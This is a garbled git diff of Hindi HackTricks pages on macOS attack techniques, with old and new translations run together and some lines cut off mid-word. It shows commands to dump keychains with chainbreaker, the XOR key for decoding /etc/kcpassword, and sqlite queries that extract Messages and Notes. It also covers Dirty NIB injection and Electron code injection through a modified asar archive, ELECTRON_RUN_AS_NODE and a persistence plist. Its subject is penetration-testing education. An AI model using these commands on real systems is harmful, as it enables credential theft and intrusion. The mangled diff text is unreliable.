### **उपयोगकर्ता के पासवर्ड का उपयोग करके keychain कुंजियों को डंप करें (पासवर्ड के साथ)** #### **उपयोगकर्ता के पासवर्ड का उपयोग करके कीचेन कुंजी (साथ में पासवर्ड) डंप करें**
यदि आप उपयोगकर्ता का पासवर्ड जानते हैं तो आप इसका उपयोग **उपयोगकर्ता के संबंधित keychain को डंप करने और डिक्रिप्ट करने** के लिए कर सकते हैं। यदि आप उपयोगकर्ता का पासवर्ड जानते हैं तो आप इसका उपयोग करके **उपयोगकर्ता की कीचेन कुंजियों को डंप और डिक्रिप्ट** कर सकते हैं।
```bash ```bash
#Prompt to ask for the password #Prompt to ask for the password
python2.7 chainbreaker.py --dump-all --password-prompt /Users/<username>/Library/Keychains/login.keychain-db python2.7 chainbreaker.py --dump-all --password-prompt /Users/<username>/Library/Keychains/login.keychain-db
``` ```
### kcpassword ### kcpassword
**kcpassword** फ़ाइल एक ऐसी फ़ाइल है जिसमें **उपयोगकर्ता का लॉगिन पासवर्ड** होता है, लेकिन केवल तब जब सिस्टम के मालिक ने **स्वचालित लॉगिन सक्षम** किया हो। इसलिए, उपयोगकर्ता को बिना पासवर्ड मांगे स्वतः ही लॉग इन किया जाएगा (जो कि बहुत सुरक्षित नहीं है)। **kcpassword** फ़ाइल एक फ़ाइल है जो **उपयोगकर्ता का लॉगिन पासवर्ड** रखती है, लेकिन केवल तभी जब सिस्टम के मालिक ने **स्वचालित लॉगिन** को सक्षम किया है। इसलिए, उपयोगकर्ता को पासवर्ड के बिना स्वचालित रूप से लॉग इन किया जाएगा (जो बहुत ही सुरक्षित नहीं है)।
पासवर्ड फ़ाइल **`/etc/kcpassword`** में की **`0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F`** के साथ xored होता है। अगर उपयोगकर्ता का पासवर्ड की से लंबा होता है, तो की का पुन: उपयोग किया जाएगा।\ पासवर्ड **`/etc/kcpassword`** फ़ाइल में **`0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F`** कुंजी के साथ xored रूप में संग्रहीत है। अगर उपयोगकर्ता का पासवर्ड कुंजी से लंबा है, तो कुंजी का पुनः उपयोग किया जाएगा।\
इससे पासवर्ड को पुनः प्राप्त करना काफी आसान हो जाता है, उदाहरण के लिए [**इस स्क्रिप्ट**](https://gist.github.com/opshope/32f65875d45215c3677d) का उपयोग करके। इससे पासवर्ड को पुनः प्राप्त करना काफी आसान बना देता है, उदाहरण के लिए [**इस**](https://gist.github.com/opshope/32f65875d45215c3677d) जैसे स्क्रिप्ट का उपयोग करके।
## डेटाबेस में रोचक जानकारी ## डेटाबेस में दिलचस्प जानकारी
### Messages ### संदेश
```bash ```bash
sqlite3 $HOME/Library/Messages/chat.db .tables sqlite3 $HOME/Library/Messages/chat.db .tables
sqlite3 $HOME/Library/Messages/chat.db 'select * from message' sqlite3 $HOME/Library/Messages/chat.db 'select * from message'
@ -143,36 +140,36 @@ sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets'
``` ```
### सूचनाएं ### सूचनाएं
आप सूचनाओं का डेटा `$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/` में पा सकते हैं। आप `$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/` में सूचनाएं डेटा पा सकते हैं।
अधिकांश रोचक जानकारी **blob** में होगी। इसलिए आपको उस सामग्री को **निकालना** होगा और उसे **मानव** **पठनीय** रूप में **परिवर्तित** करना होगा या **`strings`** का उपयोग करना होगा। इसे एक्सेस करने के लिए आप कर सकते हैं: अधिकांश दिलचस्प जानकारी **ब्लॉब** में होगी। इसलिए आपको उस सामग्री को **निकालना** होगा और **मानव** **पठनीय** बनाना होगा या **`strings`** का उपयोग करना होगा। इस तक पहुंचने के लिए आप कर सकते हैं:
{% code overflow="wrap" %}
```bash ```bash
cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/ cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack
``` ```
### नोट्स ### नोट
उपयोगकर्ता के **नोट्स** `~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite` में पाए जा सकते हैं। उपयोगकर्ताओं के **नोट** यहाँ मिल सकते हैं `~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite`
{% code overflow="wrap" %} {% endcode %}
```bash ```bash
sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite .tables sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite .tables
#To dump it in a readable format: #To dump it in a readable format:
for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select Z_PK from ZICNOTEDATA;"); do sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select writefile('body1.gz.z', ZDATA) from ZICNOTEDATA where Z_PK = '$i';"; zcat body1.gz.Z ; done for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select Z_PK from ZICNOTEDATA;"); do sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select writefile('body1.gz.z', ZDATA) from ZICNOTEDATA where Z_PK = '$i';"; zcat body1.gz.Z ; done
``` ```
{% endcode %}
<details> <details>
<summary><strong>शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके: दूसरे तरीके HackTricks का समर्थन करने के लिए:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहत हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज़ में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें। * **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>

View file

@ -2,27 +2,32 @@
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert) के साथ</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी कंपनी का विज्ञापन **HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें। * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos। * **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में
</details> </details>
**तकनीक के बारे में अधिक विवरण के लिए मूल पोस्ट देखें: [https://blog.xpnsec.com/dirtynib/**](https://blog.xpnsec.com/dirtynib/)**। यहां एक सारांश है: **तकनीक के बारे में अधिक विवरण के लिए मूल पोस्ट देखें: [https://blog.xpnsec.com/dirtynib/**](https://blog.xpnsec.com/dirtynib/).** यहाँ एक सारांश है:
NIB फ़ाइलें, Apple के विकास पारिस्थितिकी का हिस्सा, एप्लिकेशन में **UI तत्वों** और उनके बीच के अंतर्क्रियाएँ परिभाषित करने के लिए हैं। वे विंडोज और बटन्स जैसे सिरीयलाइज़ड ऑब्जेक्ट्स को शामिल करते हैं, और रनटाइम पर लोड किए जाते हैं। इनके लगातार उपयोग के बावजूद, Apple अब अधिक समग्र UI फ्लो विज़ुअलाइज़ेशन के लिए स्टोरीबोर्ड का समर्थन करता है। NIB फ़ाइलें, Apple के विकास पारिस्थितिकी का हिस्सा, एप्लिकेशन में **UI तत्वों** और उनके बीच के अंतराक्रियाओं को परिभाषित करने के लिए हैं। इनमें विंडोज और बटन्स जैसे सिरीयलाइज़ड ऑब्जेक्ट्स शामिल हैं, और रनटाइम पर लोड किए जाते हैं। इनके लगातार उपयोग के बावजूद, Apple अब अधिक समग्र UI फ्लो विज़ुअलाइज़ेशन के लिए स्टोरीबोर्ड का समर्थन करता है।
### NIB फ़ाइलों के साथ सुरक्षा संबंधित चिंताएँ ### NIB फ़ाइलों के साथ सुरक्षा संबंधित चिंताएँ
**NIB फ़ाइलें सुरक्षा जोखिम** हो सकती हैं। उनमें **विचारहीन कमांड्स को निष्पादित** करने की क्षमता होती है, और एप्लिकेशन में NIB फ़ाइलों में परिवर्तन Gatekeeper को एप्लिकेशन को निष्पादित करने से नहीं रोकते, जो एक महत्वपूर्ण धमाका है। **NIB फ़ाइलें सुरक्षा जोखिम** हो सकती हैं। इनमें **विचारशील कमांड्स को निष्पादित** करने की क्षमता होती है, और एप्लिकेशन के भीतर NIB फ़ाइलों में परिवर्तन Gatekeeper को एप्लिकेशन को निष्पादित करने से नहीं रोकते, जो एक महत्वपूर्ण खतरा प्रस्तुत करता है।
### डर्टी NIB इंजेक्शन प्रक्रिया ### डर्टी NIB इंजेक्शन प्रक्रिया
#### NIB फ़ाइल बनाना और सेटअप करना #### NIB फ़ाइल बनाना और सेटअप करना
1. **प्रारंभिक सेटअप**: 1. **प्रारंभिक सेटअप**:
- XCode का उपयोग करके एक नई NIB फ़ाइल बनाएं। - XCode का उपयोग करके एक नई NIB फ़ाइल बनाएं।
- इंटरफेस में एक ऑब्ज - इंटरफ़ेस में एक ऑब्जेक्ट जोड़ें, जिसका क्लास `NSAppleScript` पर सेट करें।
- उपयोगकर्ता परिभाषित रनटाइम गुणों के माध्यम से प्रारंभिक `source` गुण कॉन्फ़िगर करें।
2. **कोड निष्पादन गैजेट**:
- सेटअप करता है कि AppleScript को मांग पर चलाया जा सके।
- `Apple Script` ऑब्ज

View file

@ -1,41 +1,41 @@
# macOS Electron एप्लिकेशन्स इंजेक्शन # macOS इलेक्ट्रॉन एप्लिकेशन्स इंजेक्शन
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary><strong>जीरो से हीरो तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का पालन करें.** * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** का** **अनुसरण** करें।
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें. * **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
## मूल जानकारी ## मूल जानकारी
यदि आपको नहीं पता कि Electron क्या है, तो आप [**यहाँ बहुत सारी जानकारी पा सकते हैं**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps). लेकिन अभी के लिए बस जान लें कि Electron **node** चलाता है.\ अगर आपको पता नहीं है कि इलेक्ट्रॉन क्या है, तो आप [**यहाँ बहुत सारी जानकारी पा सकते हैं**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps)। लेकिन अब तक यह जान लें कि इलेक्ट्रॉन **नोड** चलाता है।\
और node में कुछ **पैरामीटर्स** और **env वेरिएबल्स** होते हैं जिनका उपयोग करके **अन्य कोड को निष्पादित करने** के लिए किया जा सकता है, निर्दिष्ट फाइल के अलावा. और नोड के कुछ **पैरामीटर** और **एनवायरनमेंट वेरिएबल्स** हैं जो **इसे इंजेक्शन करने** के लिए उपयोग किया जा सकता है निर्दिष्ट फ़ाइल के अलावा।
### Electron Fuses ### इलेक्ट्रॉन फ्यूज़
ये तकनीकें आगे चर्चा की जाएंगी, लेकिन हाल के समय में Electron ने कई **सुरक्षा झंडे जोड़े हैं उन्हें रोकने के लिए**. ये हैं [**Electron Fuses**](https://www.electronjs.org/docs/latest/tutorial/fuses) और ये वे हैं जो macOS में Electron एप्लिकेशन्स को **मनमाने कोड लोड करने से रोकते हैं**: इन तकनीकों पर आगे चर्चा की जाएगी, लेकिन हाल के समय में इलेक्ट्रॉन ने इन्हें रोकने के लिए कई **सुरक्षा झंडे जोड़े हैं**। ये हैं [**इलेक्ट्रॉन फ्यूज़**](https://www.electronjs.org/docs/latest/tutorial/fuses) और ये वे हैं जो इलेक्ट्रॉन ऐप्स को macOS में **अर्बिट्रे कोड लोड करने से रोकने** के लिए उपयोग किए जाते हैं:
* **`RunAsNode`**: यदि निष्क्रिय किया गया है, तो यह env var **`ELECTRON_RUN_AS_NODE`** का उपयोग करके कोड इंजेक्ट करने से रोकता है. * **`RunAsNode`**: यदि यह अक्षम है, तो यह एनवायरनमेंट वेरिएबल **`ELECTRON_RUN_AS_NODE`** का उपयोग कोड इंजेक्ट करने से रोकता है
* **`EnableNodeCliInspectArguments`**: यदि निष्क्रिय किया गया है, तो पैरामीटर्स जैसे कि `--inspect`, `--inspect-brk` का सम्मान नहीं किया जाएगा. इस तरह से कोड इंजेक्ट करने से बचते हैं. * **`EnableNodeCliInspectArguments`**: यदि यह अक्षम है, तो `--inspect`, `--inspect-brk` जैसे पैरामीटर सम्मानित नहीं किए जाएंगे। इस तरह कोड इंजेक्शन से बचाया जाएगा।
* **`EnableEmbeddedAsarIntegrityValidation`**: यदि सक्षम किया गया है, तो लोड की गई **`asar`** **फाइल** को macOS द्वारा **मान्य** किया जाएगा. इस तरह से इस फाइल की सामग्री को संशोधित करके **कोड इंजेक्शन** को **रोकता** है. * **`EnableEmbeddedAsarIntegrityValidation`**: यदि सक्षम है, तो लोड किया गया **`asar`** **फ़ाइल** macOS द्वारा **सत्यापित** किया जाएगा। इस तरह कोड इंजेक्शन से बचाया जाएगा जिसमें इस फ़ाइल की सामग्री को संशोधित किया जाता है।
* **`OnlyLoadAppFromAsar`**: यदि यह सक्षम है, तो इसके बजाय कि निम्नलिखित क्रम में लोड करने की खोज की जाए: **`app.asar`**, **`app`** और अंत में **`default_app.asar`**. यह केवल app.asar की जांच करेगा और उपयोग करेगा, इस प्रकार यह सुनिश्चित करता है कि जब **`embeddedAsarIntegrityValidation`** फ्यूज के साथ **संयुक्त** होता है तो यह **असंभव** है कि **मान्य नहीं किए गए कोड को लोड करें**. * **`OnlyLoadAppFromAsar`**: यदि यह सक्षम है, तो निम्नलिखित क्रम में लोड करने की जगह खोजने की बजाय: **`app.asar`**, **`app`** और अंत में **`default_app.asar`**। यह केवल app.asar की जाँच करेगा और उसका उपयोग करेगा, इसलिए जब **`embeddedAsarIntegrityValidation`** फ्यूज़ के साथ मिलाकर उपयोग किया जाए, तो **सत्यापित कोड लोड करना असंभव** होगा।
* **`LoadBrowserProcessSpecificV8Snapshot`**: यदि सक्षम है, तो ब्राउज़र प्रक्रिया अपने V8 स्नैपशॉट के लिए `browser_v8_context_snapshot.bin` नामक फाइल का उपयोग करती है. * **`LoadBrowserProcessSpecificV8Snapshot`**: यदि सक्षम है, तो ब्राउज़र प्रक्रिया `browser_v8_context_snapshot.bin` फ़ाइल का उपयोग अपने V8 स्नैपशॉट के लिए करेगी।
एक और दिलचस्प फ्यूज जो कोड इंजेक्शन को रोक नहीं हा है: एक और दिलचस्प फ्यूज जो कोड इंजेक्शन को रोकने वाला नहीं होगा है:
* **EnableCookieEncryption**: यदि सक्षम है, तो डिस्क पर कुकी स्टोर OS स्तर की क्रिप्टोग्राफी कुंजियों का उपयोग करके एन्क्रिप्टेड होता है. * **EnableCookieEncryption**: यदि सक्षम है, तो डिस्क पर कुकी स्टोर OS स्तर के एनक्रिप्शन कुंजियों का उपयोग करके एन्क्रिप्ट किया जाता है।
### Electron Fuses की जांच करना ### इलेक्ट्रॉन फ्यूज़ की जाँच
आप एक एप्लिकेशन से इन झंडों की **जांच कर सकते हैं** : आप एक एप्लिकेशन से **इन झंडों की जाँच** कर सकते हैं:
```bash ```bash
npx @electron/fuses read --app /Applications/Slack.app npx @electron/fuses read --app /Applications/Slack.app
@ -51,45 +51,45 @@ LoadBrowserProcessSpecificV8Snapshot is Disabled
``` ```
### इलेक्ट्रॉन फ्यूज़ को संशोधित करना ### इलेक्ट्रॉन फ्यूज़ को संशोधित करना
जैसा कि [**डॉक्स में उल्लेख है**](https://www.electronjs.org/docs/latest/tutorial/fuses#runasnode), **इलेक्ट्रॉन फ्यूज़**ी कॉन्फ़िगरेशन **इलेक्ट्रॉन बाइनरी** के अंदर कॉन्फ़िगर की जाती है जिसमें कहीं न कहीं स्ट्रिंग **`dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX`** होती है। जैसा कि [**दस्तावेज़ उल्लेख करते हैं**](https://www.electronjs.org/docs/latest/tutorial/fuses#runasnode), **इलेक्ट्रॉन फ्यूज़**ा विन्यास **इलेक्ट्रॉन बाइनरी** में किया जाता है जिसमें कहीं **`dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX`** स्ट्रिंग होती है।
macOS एप्लिकेशन्स में यह आमतौर पर `application.app/Contents/Frameworks/Electron Framework.framework/Electron Framework` में होता है। macOS एप्लिकेशन में यह आम तौर पर `application.app/Contents/Frameworks/Electron Framework.framework/Electron Framework` में होता है।
```bash ```bash
grep -R "dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX" Slack.app/ grep -R "dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX" Slack.app/
Binary file Slack.app//Contents/Frameworks/Electron Framework.framework/Versions/A/Electron Framework matches Binary file Slack.app//Contents/Frameworks/Electron Framework.framework/Versions/A/Electron Framework matches
``` ```
आप इस फ़ाइल को [https://hexed.it/](https://hexed.it/) में लोड कर सकते हैं और पिछली स्ट्रिंग के लिए खोज कर सकते हैं। इस स्ट्रिंग के बाद आप ASCII में एक नंबर "0" या "1" देख सकते हैं जो दर्शाता है कि प्रत्येक फ्यूज अक्षम या सक्षम है। बस हेक्स कोड को मॉडिफाई करें (`0x30` है `0` और `0x31` है `1`) ताकि **फ्यूज मानों को संशोधित करें** आप इस फ़ाइल को [https://hexed.it/](https://hexed.it/) में लोड कर सकते हैं और पिछले स्ट्रिंग की खोज कर सकते हैं। इस स्ट्रिंग के बाद, ASCII में एक संख्या "0" या "1" दिखाई देगी जो प्रत्येक फ्यूज़ को अक्षम या सक्षम करती है। फ्यूज़ मानों को **संशोधित** करने के लिए हेक्स कोड को संशोधित करें (`0x30` को `0` और `0x31` को `1` बनाएं)
<figure><img src="../../../.gitbook/assets/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../.gitbook/assets/image (2) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
ध्यान दें कि यदि आप इन बाइट्स को संशोधित करके किसी एप्लिकेशन के अंदर **`Electron Framework` बाइनरी** को **ओवरराइट** करने की कोशिश करते हैं, तो ऐप चलेगा नहीं ध्यान दें कि यदि आप इस बाइट को संशोधित करके **`Electron Framework` बाइनरी** को एक एप्लिकेशन के अंदर अधिलेखित करने का प्रयास करें, तो ऐप नहीं चलेगा
## RCE इलेक्ट्रॉन एप्लिकेशन्स में कोड जोड़ना ## RCE कोड जोड़ना Electron एप्लिकेशन में
इलेक्ट्रॉन ऐप जो **बाहरी JS/HTML फ़ाइलें** इस्तेमाल कर रहा हो सकता है, तो एक हमलावर इन फ़ाइलों में कोड इंजेक्ट कर सकता है जिसकी हस्ताक्षर की जांच नहीं की जाएगी और ऐप के संदर्भ में मनमाना कोड निष्पादित कर सकता है। एक Electron ऐप्लिकेशन का उपयोग करने वाले **बाहरी JS/HTML फ़ाइलें** हो सकती हैं, इसलिए एक हमलावर इन फ़ाइलों में कोड इंजेक्ट कर सकता है जिसका हस्ताक्षर जांचा नहीं जाएगा और ऐप के संदर्भ में विचित्र कोड को निष्पादित कर सकता है।
{% hint style="danger" %} {% hint style="danger" %}
हालांकि, इस समय 2 सीमाएँ हैं: हालांकि, इस समय 2 सीमाएँ हैं:
* एक ऐप को संशोधित करने के लिए **`kTCCServiceSystemPolicyAppBundles`** अनुमति **आवश्यक** है, इसलिए डिफ़ॉल्ट रूप से यह अब संभव नहीं है। * **`kTCCServiceSystemPolicyAppBundles`** अनुमति की आवश्यकता है एक ऐप को संशोधित करने के लिए, इसलिए डिफ़ॉल्ट रूप से यह अब संभव नहीं है।
* संकलित **`asap`** फ़ाइल में आमतौर पर फ्यूज **`embeddedAsarIntegrityValidation`** `और` **`onlyLoadAppFromAsar`** `सक्षम` होते हैं * संकलित **`asap`** फ़ाइल में आम तौर पर फ्यूज **`embeddedAsarIntegrityValidation`** और **`onlyLoadAppFromAsar`** सक्षम होते हैं
इस हमले के मार्ग को अधिक जटिल (या असंभव) बनाते हैं। इस हमले का मार्ग अधिक जटिल (या असंभव) बनाते हैं।
{% endhint %} {% endhint %}
ध्यान दें कि **`kTCCServiceSystemPolicyAppBundles`** की आवश्यकता को बायपास करना संभव है, ऐप्लिकेशन को दूसरी डायरेक्टरी (जैसे **`/tmp`**) में कॉपी करके, फोल्डर **`app.app/Contents`** का नाम बदलकर **`app.app/NotCon`**, **संशोधित** करना आपके **दुर्भावनापूर्ण** कोड के साथ **asar** फ़ाइल, इसे वापस **`app.app/Contents`** के नाम पर बदलना और इसे निष्पादित करना ध्यान दें कि **`kTCCServiceSystemPolicyAppBundles`** की आवश्यकता को छोड़ना संभव है एक अन्य निर्देशिका में एप्लिकेशन की कॉपी करके (जैसे **`/tmp`**), फ़ोल्डर **`app.app/Contents`** को **`app.app/NotCon`** नामक करके, अपने **हानिकारक** कोड के साथ **asar** फ़ाइल को संशोधित करके, इसे फिर से **`app.app/Contents`** नामक करके और इसे निष्पादित करके **संभव** है
आप asar फ़ाइल से कोड अनपैक कर सकते हैं: आप एसार फ़ाइल से कोड को अनपैक कर सकते हैं:
```bash ```bash
npx asar extract app.asar app-decomp npx asar extract app.asar app-decomp
``` ```
और इसे संशोधित करने के बाद वापस पैक करें: और उसे बाद में पैक करें जब आप इसे संशोधित कर चुके हों:
```bash ```bash
npx asar pack app-decomp app-new.asar npx asar pack app-decomp app-new.asar
``` ```
## `ELECTRON_RUN_AS_NODE` के साथ RCE <a href="#electron_run_as_node" id="electron_run_as_node"></a> ## `ELECTRON_RUN_AS_NODE` के साथ RCE <a href="#electron_run_as_node" id="electron_run_as_node"></a>
[**डॉक्स के अनुसार**](https://www.electronjs.org/docs/latest/api/environment-variables#electron\_run\_as\_node), यदि यह env वेरिएबल सेट है, तो यह प्रक्रिया क सामान्य Node.js प्रक्रिया के रूप में शुरू करेगा [**दस्तावेज़**](https://www.electronjs.org/docs/latest/api/environment-variables#electron\_run\_as\_node) के अनुसार, यदि यह env variable सेट किया जाता है, तो यह प्रक्रिया क सामान्य Node.js प्रक्रिया के रूप में शुरू होगी
{% code overflow="wrap" %} {% code overflow="wrap" %}
```bash ```bash
@ -101,12 +101,12 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/
{% endcode %} {% endcode %}
{% hint style="danger" %} {% hint style="danger" %}
यदि fuse **`RunAsNode`** निष्क्रिय है तो env var **`ELECTRON_RUN_AS_NODE`** को नदेखा किया जाएगा, और यह काम नहीं करेगा। यदि फ्यूज **`RunAsNode`** अक्षम है तो env var **`ELECTRON_RUN_AS_NODE`** को नजरअंदा किया जाएगा, और यह काम नहीं करेगा।
{% endhint %} {% endhint %}
### App Plist से Injection ### एप्लिकेशन प्लिस्ट से इंजेक्शन
[**यहाँ प्रस्तावित**](https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/) के अनुसार, आप इस env variable का उपयोग plist में कर सकते हैं ताकि पर्सिस्टेंस बनाए रखा जा सके: जैसा कि [**यहाँ सुझाव दिया गया है**](https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/), आप इस env वेरिएबल का दुरुपयोग कर सकते हैं एक प्लिस्ट में स्थिरता बनाए रखने के लिए:
```xml ```xml
<?xml version="1.0" encoding="UTF-8"?> <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
@ -132,9 +132,7 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/
``` ```
## `NODE_OPTIONS` के साथ RCE ## `NODE_OPTIONS` के साथ RCE
